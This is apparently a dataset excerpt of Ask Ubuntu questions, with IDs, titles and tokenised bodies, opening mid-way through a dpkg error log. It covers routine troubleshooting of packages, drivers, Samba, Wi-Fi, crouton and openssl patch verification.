libplexus-io-java libplexus-sec-dispatcher-java libplexus-utils-java libplexus-velocity-java libqdox-java libslf4j-java libwagon-java libwerken.xpath-java libxbean-java libxmlgraphics-commons-java libxpp2-java libxpp3-java velocity use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 129 not upgraded . 78 not fully installed or removed . need to get 0 b/41.3 mb of archives . after this operation , 0 b of additional disk space will be used . dpkg : error processing package dpkg ( -- configure ) : package dpkg is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libbsh-java ( -- configure ) : package libbsh-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package bsh ( -- configure ) : package bsh is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libjaxp1.3-java ( -- configure ) : package libjaxp1.3-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libxalan2-java ( -- configure ) : no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already package libxalan2-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libbsf-java ( -- configure ) : package libbsf-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libavalon-framework-java ( -- configure ) : package libavalon-framework-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libcommons-io-java ( -- configure ) : package libcommons-io-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package java-wrappers ( -- configure ) : package java-wrappers is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libbatik-java ( -- configure ) : package libbatik-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libxmlgraphno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ics-commons-java ( -- configure ) : package libxmlgraphics-commons-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libfop-java ( -- configure ) : package libfop-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package fop ( -- configure ) : package fop is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libantlr-java ( -- configure ) : package libantlr-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libatinject-jsr330-api-java ( -- configure ) : package libatinject-jsr330-api-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libclassworlds-java ( -- configure ) : package libclassworlds-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : erno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ror processing package libcommons-configuration-java ( -- configure ) : package libcommons-configuration-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libcommons-jexl2-java ( -- configure ) : package libcommons-jexl2-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libcommons-jxpath-java ( -- configure ) : package libcommons-jxpath-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libcommons-net2-java ( -- configure ) : package libcommons-net2-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libcommons-validator-java ( -- configure ) : package libcommons-validator-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libcommons-vfs-java ( -- configure ) : package libcommno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ons-vfs-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libjaxen-java ( -- configure ) : package libjaxen-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libxpp2-java ( -- configure ) : package libxpp2-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libxpp3-java ( -- configure ) : package libxpp3-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libdom4j-java ( -- configure ) : package libdom4j-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libhttpcore-java ( -- configure ) : package libhttpcore-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libhttpclient-java ( -- configure ) : package libhno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ttpclient-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libitext1-java ( -- configure ) : package libitext1-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package liblog4j1.2-java ( -- configure ) : package liblog4j1.2-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libplexus-interpolation-java ( -- configure ) : package libplexus-interpolation-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libplexus-utils-java ( -- configure ) : package libplexus-utils-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libplexus-container-default-java ( -- configure ) : package libplexus-container-default-java is not ready for configuration can not configure ( current status `half-inno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already stalled ' ) dpkg : error processing package libjsr305-java ( -- configure ) : package libjsr305-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libguava-java ( -- configure ) : package libguava-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libplexus-classworlds-java ( -- configure ) : package libplexus-classworlds-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libxbean-java ( -- configure ) : package libxbean-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libplexus-containers-java ( -- configure ) : package libplexus-containers-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libplexus-i18n-java ( -- configure ) : package libplexus-i18n-java is not ready for conno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already figuration can not configure ( current status `half-installed ' ) dpkg : error processing package libdoxia-java ( -- configure ) : package libdoxia-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libexcalibur-logkit-java ( -- configure ) : package libexcalibur-logkit-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libjdom1-java ( -- configure ) : package libjdom1-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libwerken.xpath-java ( -- configure ) : package libwerken.xpath-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package velocity ( -- configure ) : package velocity is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libplexus-velocity-java ( -- configure ) : package libplexuno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already s-velocity-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libdoxia-sitetools-java ( -- configure ) : package libdoxia-sitetools-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libganymed-ssh2-java ( -- configure ) : package libganymed-ssh2-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libjdependency-java ( -- configure ) : package libjdependency-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libslf4j-java ( -- configure ) : package libslf4j-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libjetty-java ( -- configure ) : package libjetty-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : error processing package libjsoup-java ( -- configure ) : package libjsoup-java is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : too many errors , stopping errors were encountered while processing : dpkg libbsh-java bsh libjaxp1.3-java libxalan2-java libbsf-java libavalon-framework-java libcommons-io-java java-wrappers libbatik-java libxmlgraphics-commons-java libfop-java fop libantlr-java libatinject-jsr330-api-java libclassworlds-java libcommons-configuration-java libcommons-jexl2-java libcommons-jxpath-java libcommons-net2-java libcommons-validator-java libcommons-vfs-java libjaxen-java libxpp2-java libxpp3-java libdom4j-java libhttpcore-java libhttpclient-java libitext1-java liblog4j1.2-java libplexus-interpolation-java libplexus-utils-java libplexus-container-default-java libjsr305-java libguava-java libplexus-classworlds-java libxbean-java libplexus-containers-java libplexus-i18n-java libdoxia-java libexcalibur-logkit-java libjdom1-java libwerken.xpath-java velocity libplexus-velocity-java libdoxia-sitetools-java libganymed-ssh2-java libjdependency-java libslf4j-java libjetty-java libjsoup-java processing was halted because there were too many errors . e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dugi @ dugi : ~ $
482409	python : how to have to change a variable once , and never change it again	flub = raw_input ( `` where would you like your save directory to be ? ) savedir = flub hello ubuntu , i am writing a python program . my question is , how can i make it so a raw_input asks me a question that defines a variable ( in this case variable is flub ) , then changes the code so that the variable is always the same . when i change the flub variable in the program , i would like it to always remember what i changed the variable to . note : this code is just an example , i am really working with an advanced program with a graphical interface , and i did n't want to post it here on the ubuntu fourms . if you have any questions , please ask . thanks ubuntu : )
482411	how to reverse engineer deb file ?	is it possible to reverse engineer or have a dry run of a deb package in order to see what files and directories it will deploy and perform other settings modifications ? sort of like list the contents of a tar file without extracting them .
482416	permanently disable internal lcd panel lenovo r61	i build a pseudo-desktop from a lenovo thinkpad r61 with an htpc/media server in mind . i took apart the laptop , physically detached the busted panel , built a nice wooden case for it and a 21 '' vga lcd screen i had laying around useless . i loaded it up with latest ubuntu release , runs smoothly , but i have got into an issue that is busting my brains out my nose and ears . first time i booted , i knew the os was still using the lcd panel , as stated on some other answer , the first thing i did was de-activating the screen on the monitor configuration , which finally let me change the resolution , so far so good . then i noticed something very strange , at logon screen , if i move my mouse to the left side of the screen , everything went kaput ! the login box `` jumped '' to the non-existent screen . i mean by this , that i was left only with the background . as if it moved to the other screen . then , just to confirm , i moved the position of the ghost screen to the right side , tested again and the same behaviour was the result . i then went to the bios , and there i selected as preferred output vga only . i thought i had this under control , but having deactivated the output , the internal panel should not appear on the monitor configuration right ? nope . and the same behaviour of the logon screen still persists . i know this is just a tiny annoyance , but what drives me crazy is that the computer is still putting out two video outputs , thus consuming resources . as i just trimmed the ribbon connector , i re-opened the laptopâ´s zombie corpse and removed the leftover ribbon and connector . the system still `` sees '' the internal monitor . this specific computer has a intel core2duo cpu , intel graphics , and one gig ram . this bug , or issue is present with the bundled drivers as well as with the latest intel propietary drivers . iâ´d love some advice on what to do ! and by the way , greetings from a new linux lover from colombia . i am impressed with the community support and bazillions of different answers for any issue one may run into ! i have researched this for 3 days with no plausible answer yet .
482417	samba server not accesible from ubuntu 14 but possible from android	**i am using raspbeery pi for smb share , it is accessible from android es explorer , both public and protected from ubuntu 14 it is able to access only public shared , not able to access protected one , keeps asking for usr/pass ** my smb.conf , samba version : 2:3.6.6-6+deb7u3 [ global ] workgroup = workgroup security=user follow symlinks = yes wide links = no hide dot files = no unix extensions = no lock directory = /var/cache/samba wins support = no wins server = 192.168.0.1 encrypt passwords = yes [ seedbox ] browsable = yes read only = no writable = yes path = /home/pi valid users = pi [ devices ] browsable = yes read only = no guest ok = yes public = yes path = /media force user = root
482418	is it possible to run multiple desktop environments on an hp chromebook 14 with ubuntu installed with crouton ?	i 'm fairly new to ubuntu , and i have successfully installed ubuntu 14.04 using both the crouton and chrubuntu methods . however , i personally prefer the crouton method as i like to easily switch back and forth between ubuntu and chrome os using the keyboard shortcut rather than the reboot . so my question is this : is it possible to be able to have multiple desktop environments when you install ubuntu with crouton ? i know you can on a traditional dual-boot , but i 'd rather use the crouton method rather than having to reboot all the time . currently when i try to log out of the desktop it automatically jumps back to chrome os without going to a traditional log-in screen like a normal dual-boot to be able to select a new desktop environment . it 's probably a long shot to ask this , but i searched all over and could n't find an answer to this ( and some topics were closed before there ever was an answer because it was considered `` off topic '' for some reason ) . it 's not a huge deal if i ca n't do this , as i do have a desktop with ubuntu , and i have xfce and e17 on that . it would just be nice if this was possible ! any help would be appreciated .
482419	python : how can i store a variable changed by the user ?	i am writing a program where basically you type information , and the information is saved in a text file . the program has to know where to save that specific text file . i have added a menu button that directs you to an area of the program where you can tell the program where you would like the program to save the file . the problem is that i would like to have to tell the program where i would like to save the file once , and only once . so after i close the program i could open it back up , and it would remember where i would like to save the file . this is not my exact code , just an example : flub = raw_input ( `` where would you like to save your file ? ) savedirectory = flub in this case , savedirectory is where i want to save the file . i would like the program to ask me where i would like to save the program once , and only once .
482420	update/upgrade to address cve-2014-0224 does not change build date	ubuntu reports that updating to libssl1.0.0 and 1.0.1-4ubuntu5.14 will address cve-2014-0224 ( usn-2232-1 ) that these are the installed libraries can be verified with apt-cache policy openssl : apt-cache policy openssl openssl : installed : 1.0.1-4ubuntu5.14 candidate : 1.0.1-4ubuntu5.14 version table : *** 1.0.1-4ubuntu5.14 0 500 http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 1.0.1-4ubuntu3 0 500 http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ precise/main amd64 packages the vulnerability was reported on june 5 , 2014 ( see here ) after updating with apt-get update and apt-get upgrade , however , openssl version -a reports that the build date was before the date the vulnerability was reported . openssl version -a openssl 1.0.1 14 mar 2012 built on : mon jun 2 19:37:18 utc 2014 platform : debian-amd64 options : bn ( 64,64 ) rc4 ( 16x , int ) des ( idx , cisc,16 , int ) blowfish ( idx ) compiler : cc -fpic -dopenssl_pic -dzlib -dopenssl_threads -d_reentrant -ddso_dlfcn -dhave_dlfcn_h -m64 -dl_endian -dtermio -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security -d_fortify_source=2 -wl , -bsymbolic-functions -wl , -z , relro -wa , -- noexecstack -wall -dopenssl_no_tls1_2_client -dopenssl_max_tls1_2_cipher_length=50 -dmd32_reg_t=int -dopenssl_ia32_sse2 -dopenssl_bn_asm_mont -dopenssl_bn_asm_mont5 -dopenssl_bn_asm_gf2m -dsha1_asm -dsha256_asm -dsha512_asm -dmd5_asm -daes_asm -dvpaes_asm -dbsaes_asm -dwhirlpool_asm -dghash_asm openssldir : `` /usr/lib/ssl '' my question : is the build date preceding the report date significant ? do i have to go outside the normal update/upgrade approach using apt and compile from source ? ( please note : this is not a duplicate of another question about cve-2014-0224 ( see here ) )
482421	help me for my ubuntu partition ?	i am new at ubuntu but very interested . i need help for my drive partitioning . pc details : dell vostro 1014 | hdd 320gb , ram 2gb and storage media as seen in the following screenshots . i want to have partition like below : a drive where i can install ubuntu like c drive of windows home like windows smallbusiness i do not need the unallocated or free space please help me . linked images are from my pc . i have tried to make partition . but not good . thanks in advance .
482423	wifi not working with ubuntu 14.04 dual boot on mac mini	i am a novice ubuntu user , and just set up dual boot on mac mini , and i am having the same problem as this guy , but i 'm not sure if his solution applies to me , or how to apply it in my case . wifi worked with usb boot drive , but when installed , no longer works . my device : broadcom 4331 with ubuntu 14.04 can not âapply changesâ in software & updates > additional drivers - simply says device is not working looking for a fairly non-technical answer . i can type into terminal , but a lot of the solutions to similar problems i have seen seem to take for granted that users know a lot of technical stuff . perhaps there is some way to install without changing that parameter , since it works in the `` try ubuntu '' mode from usb stick ? thanks ! -mark
482426	help with screen tearing in ubuntu 14.04 with nvidia 331.79 driver	i installed ubuntu 14.04 lts in my lenovo ideapad y510p which has gt 755m discrete graphics card . i installed propriety nvidia drivers version 331.79 in ubuntu . now i face screen tearing while browsing , playing videos etc . i tried various solutions but nothing worked . before installing the drivers glxgears showed 60 fps . after installing nvidia drivers glxgears shows 17400 fps . i found vsync is not working . but there is no option to enable vsync in nvidia x server settings . someone please help me to fix it .
482429	64 bit for dell poweredge 2950 ?	i have a used dell poweredge 2950 . it has windows server 2003 x86 with 4 gigs of ram . i want to get more ram and run a 64 bit os . is there a 64 bit ubuntu server operating system for dell poweredge 2950 servers ?
482431	image viewer that allows printing more than 100 %	eye of gnome can print images at different sizes than original , but it ca n't go more than 100 % . i was wondering if there was any image program that could print more than 100 % ( namely , page size . ) also , it should support svgs ( so no interpolation is required . ) gimp does n't work , because you have to know the size in advance so it can rasterize it .
482436	php5-ffmpeg not available in 14.04 's repos , what now ?	i know that from now on , unbuntu only supports libav instead of ffmpeg . but as for ffmpeg-php , i am not aware of any similar tool . so how developers are supposed to do ? is there any option beside compiling from source ?
482438	having an issue with ubuntu on my samsung chromebook ?	ok so first off i had this running pretty slick before my fiance touched it . booted it back to regular mode . so i have to go back through and turn developer mode on , and reinstall crouton and all that jazz . so for some reason when i try to start up xfce4 i get this message : chronos @ localhost / $ sudo startxfce4 entering /usr/local/chroots/precise ... /usr/bin/startxfce4 : starting x server [ dix ] could not init font path element /usr/share/fonts/x11/misc , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/cyrillic , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/100dpi/ : unscaled , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/75dpi/ : unscaled , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/type1 , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/100dpi , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/75dpi , removing from list ! [ dix ] could not init font path element /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , removing from list ! /usr/bin/xinit : xfree86_vt property unexpectedly has 0 items instead of 1 unable to create /home/elvis/.dbus/session-bus /etc/xdg/xfce4/xinitrc : 1 : /etc/xdg/xfce4/xinitrc : ssh-agent : not found xfce4-session : unable to access file /home/elvis/.iceauthority : permission denied running 'ssh-agent -s -k' /etc/xdg/xfce4/xinitrc : 1 : eval : ssh-agent : not found running exit commands ... /usr/bin/xinit : connection to x server lost waiting for x server to shut down unmounting /usr/local/chroots/precise ... sending sigterm to processes under /usr/local/chroots/precise ... chronos @ localhost / $ i just do n't know what went wrong . i even tried a hard reset as well and it still does this . also when i open chrome in normal mode it wants to keep opening tags until i make them stop . if i do get xfce to run switching back to chromeos just brings a blank screen . i really hope there is someone out there that can help me out with this issue . i had it running sweet before the wife touched it .
482440	why is radeontop showing 0,00 % in all fields ?	i 'm trying to get realtime statistics about my graphics card utilization , and the program radeontop is supposed to enable that . however , as you can see in the screenshot below , it reports all the results as 0,00 % : i am sure that my gpu does in fact work ( e.g . i can play tf2 with a nice framerate using the proprietary amd driver , and a low but playable framerate using the free radeon one ) . here 's the output of glxinfo | grep opengl when using the proprietary amd driver : opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7700 series opengl core profile version string : 4.3.12798 core profile context 13.35.1005 opengl core profile shading language version string : 4.30 opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 4.3.12798 compatibility profile context 13.35.1005 opengl shading language version string : 4.30 opengl context flags : ( none ) opengl profile mask : compatibility profile opengl extensions : here is the output of glxinfo | grep opengl when using the free radeon driver : opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd bonaire opengl core profile version string : 3.1 ( core profile ) mesa 10.1.3 opengl core profile shading language version string : 1.40 opengl core profile context flags : ( none ) opengl core profile extensions : opengl version string : 3.0 mesa 10.1.3 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : model of card : msi radeon hd 7790 ubuntu version : 14.04
482441	the system is running in low-graphics mode ubuntu 14.04	the system is running in low-graphics mode is the message i received after my laptop froze when i upgraded to ubuntun 14.04 i need this sorted been on google search all day and im not winning please help need to get my laptom running
482442	how do i change number of workspaces ?	im using ubuntu 14.04 and i need to set the number of workspaces to 2 . i tried using : dconf write /org/compiz/profiles/unity/plugins/core/hsize 2 but nothing seems to change . is there a way to change this setting without having to install an outside program ? like myunity or the unity tweak tool ?
482444	unity unable to login ( can login with xubuntu )	any and all help would be appreciated ... ok so . my laptop is ubuntu 14.04 , and the other day i restarted it and then was no longer able to login . so what happens ? i attempt to login ( lightdm ) and then it goes to wallpaper only ( not the user wallpaper ) , waits a while then goes back to the login screen . so why do i need your help - is n't there lots of threads talking about this already ? yes there is however i can not find any which solve it for me . this is what i have tried : removed .xauthority 777 pem .xauthority reinstall gnome-session , ubuntu-desktop , unity update everything reconfigure lightdm reinstall xorg i may have done more . but will update as appropriate . i am able to login with both terminal ( ctrl + alt + f1 ) and also with xubuntu-desktop ( but not gnome-shell ! ) upon trying to view some crash logs ( /usr/crash/_usr_gnome_session ... _ ) it is due to signal 11 ? some additional information . i am unable to use gdm as my screen goes black and nothing happens . i am also unable to log into the guest account . also i do not have enough linux knowledge to see all the packages which changed which might have affected this .
482447	ubuntu 14.04 with unity desktop in vmplayer 6 in windows 8 on intel gfx does n't work	i just installed ubuntu 14.04 in vmplayer 6 on windows 8 host . the installation was successfull , but on reboot the unity desktop is not working . the left panel is full with strange black slices and search for apps makes the whole screen black . i managed to launch terminal and installed gnome-shell and gnome shell is working correctly . so the 3d accelleration is working ( also installed steam and played games ) . so what can be problem ?
482448	trouble installing flash player on ubuntu	when i try to download the flash player version for ubuntu i get a screen asking what program to use to open file . as i am next to computer illiterate i have no clue
482449	what is the proper way to move from a scsi drive based install to a virtual machine ( mulitple partitions & software raid ) ?	i realize that many of the individual things that i am asking have been covered to varying degrees , but i am the unfortunate inheritor of this very goofy system that is on it 's last legs . it consists of four 16gb scsi drives in an old dell pe server with the following partition format : filesystem size used avail use % mounted on /dev/sda1 17g 1.6g 15g 10 % / udev 493m 4.0k 493m 1 % /dev tmpfs 101m 280k 100m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 501m 0 501m 0 % /run/shm /dev/md0 34g 658m 32g 3 % /var /dev/sdd5 16g 178m 15g 2 % /var/log so as can be seen root is on it 's own , and for whatever reason /var/log is as well , but /var is a software raided striped set . i considered a fresh setup but this system holds a customized version of a software package that has been out of development for over 5 years , yet it 's integral to the current developments at our company . currently i 'm trying to move this system into a virtualbox machine . i have dd images of sda1 and sdd5 and i assume i can reassign swap to some other partition or even a file once i get a working system . since there is enough room on sda1 i am currently wondering if the best option would be to move the other partitions onto the sda drive first , then work with the single image file after removing the other three physical discs from the equation . i am moderately proficient at linux management but have never had to deal with something that seems so complex . i am looking for the easiest solution that gets me from this setup to a bootable virtualbox machine that retains the customizations and am open to all suggestions at this point . edit : i do n't think it makes a huge difference but based on the repositories it looks like this server started as a 10.04 lts server and has been upgraded to 12.04 and is currently up to date with those repos .
482450	where are mounted files located after `` connecting to server '' over ftp	i 've seen this asked about windows mounts here and mtp here , but to where should i browse inside terminal if i `` connect to server ... '' over ftp ? thanks in advance !
482457	transmission tracker `` could not connect to tracker ''	i just upgraded to ubuntu 14.04 and updated transmission to 2.82 adrian @ my-little-friend : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty adrian @ my-little-friend : ~ $ transmission-gtk -- version transmission-gtk 2.82 ( 14160 ) i noticed the all the torrents i 'm currently downloading stopped and the transmission showed `` could not connect to tracker '' while the internet connection is unchanged and i can browse internet and download normally . i have tried re-installing , purging and re-adding the torrents but they bear no fruit . installed other torrent clients too ( qtorrent , deluge , ktorrent ) same results . adrian @ my-little-friend : ~ $ transmission-daemon -f [ 02:01:09.738 ] transmission 2.82 ( 14160 ) started ( session.c:738 ) [ 02:01:09.738 ] rpc server adding address to whitelist : 127.0.0.1 ( rpc-server.c:828 ) [ 02:01:09.738 ] rpc server serving rpc and web requests on port 127.0.0.1:9091/transmission/ ( rpc-server.c:1035 ) [ 02:01:09.738 ] rpc server whitelist enabled ( rpc-server.c:1039 ) [ 02:01:09.738 ] rpc server password required ( rpc-server.c:1042 ) [ 02:01:09.738 ] dht generating new id ( tr-dht.c:310 ) [ 02:01:09.738 ] using settings from `` /home/adrian/.config/transmission-daemon '' ( daemon.c:526 ) [ 02:01:09.738 ] saved `` /home/adrian/.config/transmission-daemon/settings.json '' ( variant.c:1217 ) [ 02:01:09.738 ] transmission-daemon requiring authentication ( daemon.c:546 ) [ 02:01:09.738 ] port forwarding ( nat-pmp ) initnatpmp succeeded ( 0 ) ( natpmp.c:73 ) [ 02:01:09.738 ] port forwarding ( nat-pmp ) sendpublicaddressrequest succeeded ( 2 ) ( natpmp.c:73 ) [ 02:01:11.738 ] port forwarding ( upnp ) found internet gateway device `` http : //192.168.55.1:1900/ipc '' ( upnp.c:202 ) [ 02:01:11.738 ] port forwarding ( upnp ) local address is `` 192.168.55.100 '' ( upnp.c:204 ) [ 02:01:11.738 ] port forwarding ( upnp ) port forwarding through `` http : //192.168.55.1:1900/ipc '' , service `` urn : schemas-upnp-org : service : wanipconnection:1 '' . ( local address : 192.168.55.100:51422 ) ( upnp.c:279 ) [ 02:01:11.738 ] port forwarding ( upnp ) port forwarding successful ! ( upnp.c:282 ) [ 02:01:11.738 ] port forwarding state changed from `` not forwarded '' to `` forwarded '' ( port-forwarding.c:95 ) adrian @ my-little-friend : ~ $ sudo ufw status [ sudo ] password for adrian : status : inactive adrian @ my-little-friend : ~/downloads $ ifconfig eth0 link encap : ethernet hwaddr 00:26:9e:5f:77:12 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:44 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:16436 metric:1 rx packets:7859 errors:0 dropped:0 overruns:0 frame:0 tx packets:7859 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1707198 ( 1.7 mb ) tx bytes:1707198 ( 1.7 mb ) wlan0 link encap : ethernet hwaddr 00:1e:64:5d : c3 : da inet addr:192.168.55.100 bcast:192.168.55.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:895907 errors:0 dropped:0 overruns:0 frame:0 tx packets:530457 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1311548594 ( 1.3 gb ) tx bytes:48451053 ( 48.4 mb ) adrian @ my-little-friend : ~/downloads $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' homo network '' mode : managed frequency:2.412 ghz access point : 10 : fe : ed : a5:48:44 bit rate=54 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-36 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:3535 missed beacon:0 eth0 no wireless extensions . can anyone help me with this issue ?
482460	add packages to the livecd when using ubuntu customization kit	i have ubuntu 14.04 and i want to create my own customized live cd . i chose to use the ubuntu customization kit , which i added as a package to my ubuntu install on my hard disk . now i would like to add some packages to the livecd . when attempting to use the customization kit , i get the question : would you like to continue building , or use the console ? if i choose `` continue building '' the iso file gets created and i have no option to include the extra packages i want . if i choose to use the console , no package manager starts . there is no `` run package manager '' option available . if i enter sudo apt-get install vlc the console outputs : e : unable to locate package vlc i also tried to install the synaptic package manager but the program uses my installation of ubuntu instead the one of the live cd . then i tried to use file > save marking as ... and saved the file under ~/tmp/remaster-root . afterwards i tried to copy the cached packages with the built in file explorer from the local installation to the live cd ( ~/tmp/remaster-root/var/cache/apt/archives/ ) but the files are n't copied . the whole thing is in a vmware but it should make no difference . i also tried it with the console cp -a /var/cache/apt/archives/* ~/tmp/remaster-root/var/cache/apt/archives cp : target '/home/anonymous/tmp/remaster-root/var/cache/apt/archives' is not a directory how do i integrate packages like vlc , truecrypt or tbb into the livecd ?
482463	how to open certain extension with python script	i would like to set a python script as the default method for opening a certain type of file . is there a way to do this ? for example , take the files called special.abcdef . i 'd like ubuntu to always open *.abcdef with the python script parse_abcdef.py . this script normally needs to be called with the file as the input : python parse_abcdef /dir/to/file/special.abcdef instead , it would be convenient for the os to know that every time that file type is double clicked , it would run the python script on the file . similar to the global `` open with ... '' application option . is this possible ?
482465	installation getting stuck	i am currently installing ubuntu 14.04 from a dvd . i already had 12.04 and i chose to upgrade it . the installation is stuck for some time now at `` saving installed packages ... '' and these are the last 2 lines in the terminal ( process:7467 ) glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( process:7993 ) glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed any ideas on what i can do ? thanks a lot in advance !
482467	yoga pro 2 wi-fi not working	i installed ubuntu 14.04 on my new yoga pro 2 and the wireless is not working . it started with windows 8 on it . the network manager says wi-fi is disabled by hardware switch . i tried putting a blacklist file in ect/modprobe.d as has been suggested in many places . i called the file `` blacklist-ideapad_laptop.conf '' and wrote in the file blacklist ideapad_laptop i checked to make sure that the wireless is enabled in the bios . it is . i ran rfkill list all and it displayed : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes i ran iwlist wlan0 scan and it displayed : wlan0 failed to read scan data : network is down i ran sudo rmmod ideapad_laptop and it displayed : rmmod : error : module ideapad_laptop is not currently loaded . i ran ifconfig wlp1s0 up and it displayed : wlp1s0 : error while getting interface flags : no such device . i ran `` lspci '' and it displayed : 01:00.0 network controller : intel corporation wireless 7260 ( rev 6b ) i ran sudo lshw -c network and it displayed : *-network disabled description : wireless interface product : wireless 7260 vendor : intel corporation physical id : 0 < br > bus info : pci @ 0000:01:00:0.0 logical name : wlan0 version : 6b serial : 7c:7a:91:5f:9b : fa width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : 